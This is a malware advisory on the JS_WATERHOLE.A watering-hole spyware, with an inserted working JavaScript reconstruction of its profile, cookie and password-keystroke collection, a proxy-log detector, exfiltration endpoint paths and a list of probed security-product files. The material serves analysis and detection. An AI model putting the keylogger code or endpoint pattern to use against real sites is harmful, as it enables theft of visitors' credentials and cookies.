JS_WATERHOLE.A


 PLATFORM:

Windows

  • Threat Type: Spyware

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet

This spyware executes when a user accesses certain websites where it is hosted.

It logs a user's keystrokes to steal information.

  TECHNICAL DETAILS

File Size:

Varies

File Type:

Script

Initial Samples Received Date:

14 Nov 2014

Payload:

Steals information

Arrival Details

This spyware executes when a user accesses certain websites where it is hosted.

This malware arrives via the following means:

  • loaded from the URL http://{BLOCKED}o.usa.cc/tance_script/i/?1
  • accessing compromised websites

Information Theft

This spyware gathers the following data:

  • IP address
  • Referer
  • User-Agent
  • Location
  • Cookie
  • Webpage title
  • Domain
  • Character encoding
  • Screen height and width
  • System platform
  • Default language

It logs a user's keystrokes to steal information.

Stolen Information

This spyware sends the gathered information via HTTP POST to the following URL:

  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/recv.php
  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/s.php
  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/p.php
  • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/k.php
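As an added illustration (this is not the JS_WATERHOLE.A sample and not Trend Micro's code), the following Node.js script builds the same profile from the objects a page script can read (document.referrer, navigator.userAgent, window.location, document.cookie, document.title, document.domain, document.characterSet, screen, navigator.platform, navigator.language), buffers keystrokes from keydown events, and encodes the result as a form body of the kind that would be POSTed to endpoints such as those above. The IP address is not in the profile because a script cannot read it; the receiving server takes it from the request. The mock window, the field names and the form encoding are assumptions made for the example, so that it runs under Node without a browser.

```javascript
'use strict';
// Added example: reconstructs the kind of browser profile the description
// lists. Everything here runs against an injected window-like object, so it
// can be executed offline with the constructed mock below.

// Collect the fields the description lists. Field names are assumptions.
function collectProfile(win) {
  const doc = win.document;
  const nav = win.navigator;
  return {
    referer: doc.referrer || '',                  // Referer
    ua: nav.userAgent || '',                      // User-Agent
    location: String(win.location.href || ''),   // Location
    cookie: doc.cookie || '',                     // Cookie
    title: doc.title || '',                       // Webpage title
    domain: doc.domain || '',                     // Domain
    charset: doc.characterSet || doc.charset || '', // Character encoding
    screen: `${win.screen.width}x${win.screen.height}`, // Screen size
    platform: nav.platform || '',                 // System platform
    language: nav.language || nav.userLanguage || '', // Default language
  };
}

// Keystroke buffer: listens for keydown on the document, records the key and
// the input it was typed into, and returns a function that drains the buffer
// (the point at which a logger would send it).
function attachKeyLogger(win) {
  const buffer = [];
  win.document.addEventListener('keydown', (ev) => {
    const target = ev.target || {};
    buffer.push({
      key: ev.key,
      field: target.name || target.id || target.tagName || '',
      t: Date.now(),
    });
  });
  return () => buffer.splice(0, buffer.length);
}

// application/x-www-form-urlencoded body, as a POST would carry it.
function encodeForm(obj) {
  return Object.entries(obj)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(String(v))}`)
    .join('&');
}

// Constructed mock of a victim browser; none of these values are real data.
function makeMockWindow() {
  const listeners = {};
  const document = {
    referrer: 'http://example.test/news/',
    cookie: 'sid=abc123',
    title: 'Example News',
    domain: 'example.test',
    characterSet: 'UTF-8',
    addEventListener(type, fn) { (listeners[type] = listeners[type] || []).push(fn); },
    dispatchEvent(type, ev) { (listeners[type] || []).forEach((fn) => fn(ev)); },
  };
  return {
    document,
    navigator: { userAgent: 'Mozilla/5.0 (Windows NT 5.1; rv:1.0)', platform: 'Win32', language: 'zh-CN' },
    location: { href: 'http://example.test/news/article.html' },
    screen: { width: 1024, height: 768 },
  };
}

// Runs the whole flow against the mock: profile, four keystrokes into a
// password field, then the encoded body and the drained keys.
function demo() {
  const win = makeMockWindow();
  const profile = collectProfile(win);
  const drain = attachKeyLogger(win);
  for (const key of ['p', 'a', 's', 's']) {
    win.document.dispatchEvent('keydown', { key, target: { name: 'password' } });
  }
  const keys = drain();
  return { body: encodeForm(profile), keys: keys.map((k) => k.key).join(''), field: keys[0].field };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
if (typeof module !== 'undefined') {
  module.exports = { collectProfile, attachKeyLogger, encodeForm, makeMockWindow, demo };
}
```

The body this produces (fields such as ua=, platform=Win32, screen=1024x768, charset=UTF-8 next to a cookie value) is what to look for in the request bodies of outbound POSTs when reviewing proxy captures from a suspected watering-hole visit.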

Other Details

This spyware does the following:

  • It accesses the following URLs to load other component scripts (also detected as JS_WATERHOLE.A), which perform the information gathering described below:
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?2
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?3
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?4
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?5
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?7
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?9
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?10
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?12
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?13
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?14
    • http://{BLOCKED}.{BLOCKED}.15.138/tance_script/i/d.php?15
  • It reports which of the following applications are installed by checking whether the listed files are present. The list covers security products, exploit-mitigation and application-control tools (EMET, Bit9), virtualization drivers (VMware) and common desktop software:
    • avira - c:/WINDOWS/system32/drivers/avipbb.sys
    • bitdefender_2013 - c:/Program Files/Bitdefender/Bitdefender 2013 BETA/BdProvider.dll
    • bitdefender_2013 - c:/Program Files/Bitdefender/Bitdefender 2013 BETA/Active Virus Control/avc3_000_001/avcuf32.dll
    • mcafee_enterprise - c:/Program Files/McAfee/VirusScan Enterprise/RES0402/McShield.dll
    • mcafee_enterprise - c:/Program Files/Common Files/McAfee/SystemCore/mytilus3.dll
    • mcafee_enterprise - c:/Program Files/Common Files/McAfee/SystemCore/mytilus3_worker.dll
    • avg2012 - c:/Program Files/AVG Secure Search/13.2.0.4/AVG Secure Search_toolbar.dll
    • avg2012 - c:/Program Files/Common Files/AVG Secure Search/DNTInstaller/13.2.0/avgdttbx.dll
    • avg2012 - c:/WINDOWS/system32/drivers/avgtpx86.sys
    • eset_nod32 - c:/WINDOWS/system32/drivers/eamon.sys
    • Dr.Web - c:/Program Files/DrWeb/drwebsp.dll
    • Mse - c:/WINDOWS/system32/drivers/MpFilter.sys
    • sophos - c:/PROGRA~1/Sophos/SOPHOS~1/SOPHOS~1.DLL
    • f-secure2011 - c:/program files/f-secure/scanner-interface/fsgkiapi.dll
    • f-secure2011 - c:/Program Files/F-Secure/FSPS/program/FSLSP.DLL
    • f-secure2011 - c:/program files/f-secure/hips/fshook32.dll
    • Kaspersky_2012 - c:/Program Files/Kaspersky Lab/Kaspersky Anti-Virus 2012/klwtblc.dll
    • Kaspersky_2012 - c:/WINDOWS/system32/drivers/klif.sys
    • Kaspersky_2013 - c:/Program Files/Kaspersky Lab/Kaspersky Anti-Virus 2013/remote_eka_prague_loader.dll
    • Kaspersky_2013 - c:/Program Files/Kaspersky Lab/Kaspersky Anti-Virus 2013/klwtblc.dll
    • Kaspersky_2013 - c:/WINDOWS/system32/drivers/kneps.sys
    • Kaspersky_2013 - c:/WINDOWS/system32/drivers/klflt.sys
    • WinRAR - c:/Program Files/WinRAR/WinRAR.exe
    • iTunes - c:/Program Files (x86)/iTunes/iTunesHelper.exe
    • iTunes - c:/Program Files/iTunes/iTunesHelper.exe
    • SQLServer - c:/Program Files (x86)/Microsoft SQL Server/80/COM/sqlvdi.dll
    • SQLServer - c:/Program Files/Microsoft SQL Server/80/COM/sqlvdi.dll
    • SQLServer - c:/Program Files (x86)/Microsoft SQL Server/90/COM/instapi.dll
    • SQLServer - c:/Program Files/Microsoft SQL Server/90/COM/instapi.dll
    • winzip - c:/Program Files/WinZip/WZSHLSTB.DLL
    • winzip - c:/Program Files/WinZip/ZipSendB.dll
    • 7z - c:/Program Files (x86)/7-Zip/7z.exe
    • 7z - c:/Program Files/7-Zip/7z.exe
    • vmware-server - c:/WINDOWS/system32/drivers/vmx86.sys
    • vmware-server - c:/WINDOWS/system32/drivers/vmnet.sys
    • vmware-client - c:/WINDOWS/system32/drivers/vmxnet.sys
    • symantec-endpoint - c:/WINDOWS/system32/drivers/WpsHelper.sys
    • symantec-endpoint - c:/WINDOWS/system32/drivers/SYMEVENT.SYS
    • symantec-endpoint - c:/Program Files/Symantec/Symantec Endpoint Protection/wpsman.dll
    • F-Secure - C:/Program Files/F-Secure/ExploitShield/fsesgui.exe
    • antiyfx - C:/Program Files/agb7pro/agb.exe
    • ESTsoft - C:/Program Files/ESTsoft/ALYac/AYLaunch.exe
    • ESTsoft - C:/WINDOWS/system32/drivers/EstRtw.sys
    • Fortinet - C:/Program Files/Fortinet/FortiClient/FortiClient.exe
    • Fortinet - C:/WINDOWS/system32/drivers/FortiRdr.sys
    • ViRobot4 - C:/Program Files/ViRobotXP/Vrmonnt.exe
    • VirusBuster - C:/Program Files/VirusBuster/winpers.exe
    • VirusBuster - C:/WINDOWS/system32/drivers/vbengnt.sys
    • COMODO - C:/WINDOWS/system32/drivers/cmderd.sys
    • a-squared - C:/Program Files/a-squared Anti-Malware/a2cmd.exe
    • IKARUS - C:/Program Files/IKARUS/anti.virus/unGuardX.exe
    • sophos - C:/WINDOWS/system32/drivers/SophosBootDriver.sys
    • sophos - C:/Program Files/Sophos/Sophos Anti-Virus/SavMain.exe
    • Nprotect - C:/Program Files/INCAInternet/nProtect Anti-Virus Spyware 3.0/nsphsvr.exe
    • Trend2013 - C:/Program Files/Trend Micro/Titanium/UIFramework/uiWinMgr.exe
    • Trend2013 - C:/WINDOWS/system32/drivers/tmtdi.sys
    • Norton - C:/Program Files/Norton Internet Security/Branding/muis.dll
    • Norton - C:/WINDOWS/system32/drivers/SYMEVENT.SYS
    • Outpost - C:/Program Files/Agnitum/Outpost Security Suite Pro/acs.exe
    • Outpost - C:/WINDOWS/system32/drivers/afwcore.sys
    • AhnLab_V3 - C:/Program Files/AhnLab/V3IS80/V3Main.exe
    • F-PROT - C:/Program Files/FRISK Software/F-PROT Antivirus for Windows/FPWin.exe
    • F-PROT - C:/WINDOWS/system32/drivers/FStopW.sys
    • ESET-SMART - C:/Program Files/ESET/ESET Smart Security/egui.exe
    • ESET-SMART - C:/WINDOWS/system32/drivers/eamon.sys
    • Kaspersky_Endpoint_Security_8 - C:/Program Files/Kaspersky Lab/Kaspersky Endpoint Security 8 for Windows/avp.exe
    • Norman - C:/Program Files/Norman/Nse/Bin/nse.exe
    • Norman - C:/WINDOWS/system32/drivers/nvcw32mf.sys
    • Sunbelt - C:/Program Files/Sunbelt Software/Personal Firewall/cfgconv.exe
    • QuickHeal - C:/Program Files/Quick Heal/Quick Heal Total Security/ARKIT.EXE
    • QuickHeal - C:/WINDOWS/system32/drivers/catflt.sys
    • Immunet - C:/Program Files/Immunet/ips.exe
    • Immunet - C:/WINDOWS/system32/drivers/ImmunetProtect.sys
    • JiangMin - C:/Program Files/JiangMin/AntiVirus/KVPopup.exe
    • JiangMin - C:/WINDOWS/system32/drivers/SysGuard.sys
    • PC_Tools - C:/Program Files/PC Tools Antivirus Software/pctsGui.exe
    • Rising_firewall - C:/Program Files/Rising/RFW/RavMonD.exe
    • Rising_firewall - C:/WINDOWS/system32/drivers/protreg.sys
    • BkavHome - C:/Program Files/BkavHome/Bka.exe
    • BkavHome - C:/WINDOWS/system32/drivers/BkavAuto.sys
    • SUPERAntiSpyware - C:/Program Files/SUPERAntiSpyware/SUPERAntiSpyware.exe
    • Rising - C:/Program Files/Rising/RIS/LangSel.exe
    • Rising - C:/WINDOWS/system32/drivers/HookHelp.sys
    • Symantec_Endpoint12 - C:/Program Files/Symantec/Symantec Endpoint Protection/DoScan.exe
    • eScan - C:/Program Files/eScan/shortcut.exe
    • eScan - C:/WINDOWS/system32/drivers/econceal.sys
    • Bit9 - C:/Windows/System32/drivers/Parity.sys
    • emet4.1 - C:/Program Files (x86)/EMET 4.1/EMET.dll
    • emet4.1 - C:/Program Files/EMET 4.1/EMET.dll
    • emet4.1 - d:/Program Files/EMET 4.1/EMET.dll
    • emet4.1 - D:/Program Files (x86)/EMET 4.1/EMET.dll
    • emet5.0 - C:/Program Files (x86)/EMET 5.0/EMET.dll
    • emet5.0 - C:/Program Files/EMET 5.0/EMET.dll
    • emet5.0 - d:/Program Files (x86)/EMET 5.0/EMET.dll
    • emet5.0 - d:/Program Files/EMET 5.0/EMET.dll
    • 360 - C:/Program Files/360/360Safe/360Safe.exe
    • 360 - d:/Program Files/360/360Safe/360Safe.exe
  • It also reports which of the following Windows updates are installed by checking whether the update's installation log is present in the Windows directory:
    • KB2378111 - c:/WINDOWS/KB2378111.log
    • KB954155 - c:/WINDOWS/KB954155.log
    • KB972187 - c:/WINDOWS/KB972187.log
    • KB975558 - c:/WINDOWS/KB975558.log
    • KB978695 - c:/WINDOWS/KB978695.log
    • KB2564958 - c:/WINDOWS/KB2564958.log
    • KB915865 - c:/WINDOWS/KB915865.log
    • KB2115168 - c:/WINDOWS/KB2115168.log
    • KB2229593 - c:/WINDOWS/KB2229593.log
    • KB2296011 - c:/WINDOWS/KB2296011.log
    • KB2345886 - c:/WINDOWS/KB2345886.log
    • KB2347290 - c:/WINDOWS/KB2347290.log
    • KB2360937 - c:/WINDOWS/KB2360937.log
    • KB2387149 - c:/WINDOWS/KB2387149.log
    • KB2419632 - c:/WINDOWS/KB2419632.log
    • KB2423089 - c:/WINDOWS/KB2423089.log
    • KB2440591 - c:/WINDOWS/KB2440591.log
    • KB2443105 - c:/WINDOWS/KB2443105.log
    • KB2476490 - c:/WINDOWS/KB2476490.log
    • KB2478960 - c:/WINDOWS/KB2478960.log
    • KB2478971 - c:/WINDOWS/KB2478971.log
    • KB2479943 - c:/WINDOWS/KB2479943.log
    • KB2481109 - c:/WINDOWS/KB2481109.log
    • KB2483185 - c:/WINDOWS/KB2483185.log
    • KB2485663 - c:/WINDOWS/KB2485663.log
    • KB2506212 - c:/WINDOWS/KB2506212.log
    • KB2507938 - c:/WINDOWS/KB2507938.log
    • KB2508429 - c:/WINDOWS/KB2508429.log
    • KB2509553 - c:/WINDOWS/KB2509553.log
    • KB2510581 - c:/WINDOWS/KB2510581.log
    • KB2535512 - c:/WINDOWS/KB2535512.log
    • KB2536276-v2 - c:/WINDOWS/KB2536276-v2.log
    • KB2544521 - c:/WINDOWS/KB2544521.log
    • KB2544893-v2 - c:/WINDOWS/KB2544893-v2.log
    • KB2566454 - c:/WINDOWS/KB2566454.log
    • KB2570947 - c:/WINDOWS/KB2570947.log
    • KB2584146 - c:/WINDOWS/KB2584146.log
    • KB2585542 - c:/WINDOWS/KB2585542.log
    • KB2592799 - c:/WINDOWS/KB2592799.log
    • KB2598479 - c:/WINDOWS/KB2598479.log
    • KB2603381 - c:/WINDOWS/KB2603381.log
    • KB2619339 - c:/WINDOWS/KB2619339.log
    • KB2620712 - c:/WINDOWS/KB2620712.log
    • KB2624667 - c:/WINDOWS/KB2624667.log
    • KB2631813 - c:/WINDOWS/KB2631813.log
    • KB2641690 - c:/WINDOWS/KB2641690.log
    • KB2646524 - c:/WINDOWS/KB2646524.log
    • KB2653956 - c:/WINDOWS/KB2653956.log
    • KB2655992 - c:/WINDOWS/KB2655992.log
    • KB2659262 - c:/WINDOWS/KB2659262.log
    • KB2660649 - c:/WINDOWS/KB2660649.log
    • KB2661637 - c:/WINDOWS/KB2661637.log
    • KB2676562 - c:/WINDOWS/KB2676562.log
    • KB2691442 - c:/WINDOWS/KB2691442.log
    • KB2698365 - c:/WINDOWS/KB2698365.log
    • KB2705219-v2 - c:/WINDOWS/KB2705219-v2.log
    • KB2712808 - c:/WINDOWS/KB2712808.log
    • KB2718704 - c:/WINDOWS/KB2718704.log
    • KB2719985 - c:/WINDOWS/KB2719985.log
    • KB2723135-v2 - c:/WINDOWS/KB2723135-v2.log
    • KB2724197 - c:/WINDOWS/KB2724197.log
    • KB2727528 - c:/WINDOWS/KB2727528.log
    • KB2736233 - c:/WINDOWS/KB2736233.log
    • KB2753842-v2 - c:/WINDOWS/KB2753842-v2.log
    • KB2757638 - c:/WINDOWS/KB2757638.log
    • KB2758857 - c:/WINDOWS/KB2758857.log
    • KB2761465 - c:/WINDOWS/KB2761465.log
    • KB2770660 - c:/WINDOWS/KB2770660.log
    • KB2779030 - c:/WINDOWS/KB2779030.log
    • KB923561 - c:/WINDOWS/KB923561.log
    • KB932716-v2 - c:/WINDOWS/KB932716-v2.log
    • KB943232-v2 - c:/WINDOWS/KB943232-v2.log
    • KB946648 - c:/WINDOWS/KB946648.log
    • KB950762 - c:/WINDOWS/KB950762.log
    • KB950974 - c:/WINDOWS/KB950974.log
    • KB951748 - c:/WINDOWS/KB951748.log
    • KB951830 - c:/WINDOWS/KB951830.log
    • KB951978 - c:/WINDOWS/KB951978.log
    • KB952004 - c:/WINDOWS/KB952004.log
    • KB952287 - c:/WINDOWS/KB952287.log
    • KB952954 - c:/WINDOWS/KB952954.log
    • KB953155 - c:/WINDOWS/KB953155.log
    • KB955535 - c:/WINDOWS/KB955535.log
    • KB956802 - c:/WINDOWS/KB956802.log
    • KB956844 - c:/WINDOWS/KB956844.log
    • KB958752 - c:/WINDOWS/KB958752.log
    • KB959426 - c:/WINDOWS/KB959426.log
    • KB960803 - c:/WINDOWS/KB960803.log
    • KB960859 - c:/WINDOWS/KB960859.log
    • KB967715 - c:/WINDOWS/KB967715.log
    • KB968389 - c:/WINDOWS/KB968389.log
    • KB969059 - c:/WINDOWS/KB969059.log
    • KB971029 - c:/WINDOWS/KB971029.log
    • KB971657 - c:/WINDOWS/KB971657.log
    • KB972270 - c:/WINDOWS/KB972270.log
    • KB973507 - c:/WINDOWS/KB973507.log
    • KB97381 - c:/WINDOWS/KB97381.log
  • It reports installed versions of the following applications:
    • Flash
    • MS Office
    • PDF
    • Java
  • It reports whether any of the following files are present (judging by the tags, these are the browser security controls installed by the ICBC and China Merchants Bank online-banking clients):
    • icbc - C:/Windows/SysWOW64/SubmitControl.dll
    • icbc - C:/Windows/system32/SubmitControl.dll
    • icbc - D:/Windows/SysWOW64/SubmitControl.dll
    • icbc - D:/Windows/system32/SubmitControl.dll
    • cmb - C:/Windows/system32/CMBEdit.dll
    • cmb - C:/Windows/SysWOW64/CMBEdit.dll
    • cmb - D:/Windows/system32/CMBEdit.dll
    • cmb - D:/Windows/SysWOW64/CMBEdit.dll
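Because the description names the loader, component-script and exfiltration paths, the URL paths alone give a usable detection for proxy or web-gateway logs. The following Node.js script is an added example (not Trend Micro's code and not part of the sample): it classifies each request as a loader fetch (/tance_script/i/?N), a component load (d.php?N) or exfiltration (a POST to recv.php, s.php, p.php or k.php) and reports, per client, whether the full chain was seen. The log format, client addresses and hosts are constructed for the example; the real C2 host is redacted on this page, so matching is on the path only and a hit on any host is reported.

```javascript
'use strict';
// Added example: detect JS_WATERHOLE.A request patterns in a proxy log.
// Matching is on URL path only because the C2 host is redacted on the page.

const LOADER_RE    = /\/tance_script\/i\/\?\d+$/;             // initial loader, e.g. /tance_script/i/?1
const COMPONENT_RE = /\/tance_script\/i\/d\.php\?\d+$/;       // component scripts d.php?N
const EXFIL_RE     = /\/tance_script\/i\/(recv|s|p|k)\.php$/; // POST endpoints

// Classify one request. Returns null when it does not match; a GET to an
// exfil endpoint is reported separately because the sample uses POST.
function classifyRequest(method, url) {
  let path;
  try {
    const u = new URL(url);
    path = u.pathname + u.search;
  } catch (e) {
    return null;
  }
  if (LOADER_RE.test(path)) return 'loader';
  if (COMPONENT_RE.test(path)) return 'component';
  if (EXFIL_RE.test(path)) return method.toUpperCase() === 'POST' ? 'exfil' : 'exfil-probe';
  return null;
}

// Constructed, simplified log format: "<timestamp> <client> <method> <url> <status>".
function parseLine(line) {
  const m = line.trim().match(/^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\d{3})$/);
  if (!m) return null;
  return { ts: m[1], client: m[2], method: m[3], url: m[4], status: m[5] };
}

// Summarize per client: stages seen, hosts contacted, and whether the chain
// (loader or component load followed by an exfil POST) is complete.
function scanProxyLog(text) {
  const findings = new Map();
  for (const line of text.split('\n')) {
    const rec = parseLine(line);
    if (!rec) continue;
    const kind = classifyRequest(rec.method, rec.url);
    if (!kind) continue;
    const entry = findings.get(rec.client) || { stages: new Set(), hosts: new Set(), first: rec.ts };
    entry.stages.add(kind);
    entry.hosts.add(new URL(rec.url).host);
    findings.set(rec.client, entry);
  }
  return [...findings].map(([client, e]) => ({
    client,
    first: e.first,
    stages: [...e.stages].sort(),
    hosts: [...e.hosts].sort(),
    confirmed: e.stages.has('exfil') && (e.stages.has('loader') || e.stages.has('component')),
  }));
}

// Constructed sample log. Hosts are placeholders (documentation range and
// .example names); they do not stand for the redacted addresses on the page.
const SAMPLE_LOG = `
2014-11-14T09:01:02Z 10.1.2.30 GET http://compromised.example/news/index.html 200
2014-11-14T09:01:03Z 10.1.2.30 GET http://loader.example/tance_script/i/?1 200
2014-11-14T09:01:04Z 10.1.2.30 GET http://203.0.113.10/tance_script/i/d.php?2 200
2014-11-14T09:01:04Z 10.1.2.30 GET http://203.0.113.10/tance_script/i/d.php?13 200
2014-11-14T09:01:05Z 10.1.2.30 POST http://203.0.113.10/tance_script/i/recv.php 200
2014-11-14T09:01:40Z 10.1.2.30 POST http://203.0.113.10/tance_script/i/k.php 200
2014-11-14T09:02:10Z 10.1.2.31 GET http://cdn.example/static/app.js?1 200
2014-11-14T09:03:00Z 10.1.2.32 GET http://203.0.113.10/tance_script/i/recv.php 404
`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanProxyLog(SAMPLE_LOG)) console.log(JSON.stringify(f));
}
if (typeof module !== 'undefined') {
  module.exports = { classifyRequest, parseLine, scanProxyLog, SAMPLE_LOG };
}
```

A client that only shows an exfil-probe or a single component load is worth a look but is not confirmed; a client with a loader or component fetch followed by an exfil POST has run the script and its keystrokes and cookies for the visited site should be treated as exposed.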

  SOLUTION

Minimum Scan Engine:

9.700

FIRST VSAPI PATTERN FILE:

11.276.04

FIRST VSAPI PATTERN DATE:

14 Nov 2014

VSAPI OPR PATTERN File:

11.277.00

VSAPI OPR PATTERN Date:

15 Nov 2014

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.

Step 2

Close all opened browser windows

Step 3

Scan your computer with your Trend Micro product to delete files detected as JS_WATERHOLE.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files.